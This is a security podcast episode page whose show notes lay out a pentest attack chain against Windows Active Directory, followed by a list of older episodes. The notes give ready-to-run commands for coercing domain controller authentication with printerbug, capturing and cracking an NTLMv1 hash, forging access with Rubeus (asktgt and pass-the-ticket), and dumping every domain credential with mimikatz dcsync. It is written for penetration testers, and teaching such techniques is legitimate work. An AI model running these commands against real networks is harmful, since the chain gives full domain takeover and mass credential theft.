7MS: #559: Tales of Pentest Pwnage - Part 46
7 Minute Security10 Feb 2023

7MS: #559: Tales of Pentest Pwnage - Part 46

Ooooo giggidy! Today's episode is about a pentest pwnage path that is super fun and interesting, and I've now seen 3-4 times in the wild. Here are some notes from the audio/video that will help bring this to life for you (oh and read this article for a great tech explanation of what's happening under the hood):

Change the Responder.conf file like so:

; Custom challenge. ; Use "Random" for generating a random challenge for each requests (Default) Challenge = 1122334455667788

Run Responder with --disable-ess flag

sudo python3 /opt/responder/Responder.py -I eth0 --disable-ess

Use printerbug to coax authentication from a domain controller:

sudo python3 /opt/krbrelay-dirkjanm/printerbug.py yourdomain.com/someuser@IP.OF.DOMAIN.CONTROLLER IP.OF.ATTACKING.BOX

Convert hash to make it easier to crack!

sudo python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 THE-HASH-YOU-GOT-FROM-RESPONDER

Take the NTHASH:XXX token and go to crack.sh to have it cracked in about 30 seconds!

Now you can do a Rubeus asktgt with the DC hash:

rubeus.exe asktgt /domain:yourdomain.com /user:DOMAIN-CONTROLLER-NAME$ /rc4:HASH-GOES-HERE /nowrap

Now pass the ticket and impersonate the DC LOL MUAHAHAHAHAHAHAAH!!

rubeus.exe ptt /ticket:TICKET GOES HERE

Use mimikatz to dump all hashes!

mimikatz.exe privilege::debug log hashes.txt lsadump::dcsync /domain:yourdomain.com /all /csv

Avsnitt(682)

7MS #42: Vulnerability Scans vs. Pentests (audio)

7MS #42: Vulnerability Scans vs. Pentests (audio)

I think everybody throws around the terms “vulnerability scans” and “pentests” and they mean completely different things from one person to the next. In this episode I try to clarify the differences and distinctions (in my mind, anyways). 7MS #42: Vulnerability Scans vs. Pentests (audio)

14 Feb 20157min

7MS #41: OSCP – Part 7 (audio)

7MS #41: OSCP – Part 7 (audio)

Tried of talking about OSCP yet? Me neither! 7MS #41: OSCP – Part 7 (audio)

6 Feb 20156min

7MS #40: OSCP – Part 6 (audio)

7MS #40: OSCP – Part 6 (audio)

PART SIX of a mind-bending series all about OSCP! 7MS #40: OSCP – Part 6 (audio)

31 Jan 20157min

7MS #39: Infosec on the Disney Boat (audio)

7MS #39: Infosec on the Disney Boat (audio)

I took a Disney cruise with my family recently, and one particular aspect of the trip gave me the Big Brother heebie-jeebies. 7MS #39: Infosec on the Disney Boat (audio)

24 Jan 20158min

7MS #38: OFFTOPIC – Health and Infosec (audio)

7MS #38: OFFTOPIC – Health and Infosec (audio)

Every once in a while I thought it would be fun to go slightly off topic and talk about other stuff I’m interested in. This episode kind of has a tech twist though. I talk about how I use my iPhone and a few apps to stay at least a little bit in shape. 7MS…

17 Jan 20157min

7MS #37: Keimpx (audio)

7MS #37: Keimpx (audio)

Ever wanted to pass hashes a whole network at a time? Check out this episode, where I talk about one of my fav new tools called Keipmx. 7MS #37: Keimpx (audio)

10 Jan 20157min

7MS #36: OSCP – Part 5 (audio)

7MS #36: OSCP – Part 5 (audio)

More talk about OSCP goodness. Download: 7MS #36: OSCP – Part 5 (audio)

3 Jan 20157min

7MS #35: OSCP – Part 4 (audio)

7MS #35: OSCP – Part 4 (audio)

This is the 4th thrilling installment in our exciting series about the awesome, challenging, rage-inducing, but ultimately rewarding training and certification called OSCP. Download: 7MS #35: OSCP – Part 4 (audio)

27 Dec 20146min

Populärt inom Politik & nyheter

p3-krim
flashback-forever
olyckan-inifran
svd-dokumentara-berattelser-2
rss-vad-fan-hande
rss-viva-fotboll
svenska-fall
rss-sanning-konsekvens
aftonbladet-daily
fordomspodden
motiv
krimmagasinet
blenda-2
rss-krimstad
dagens-eko
rss-frandfors-horna
spar
spotlight
rss-expressen-dok
svd-nyhetsartiklar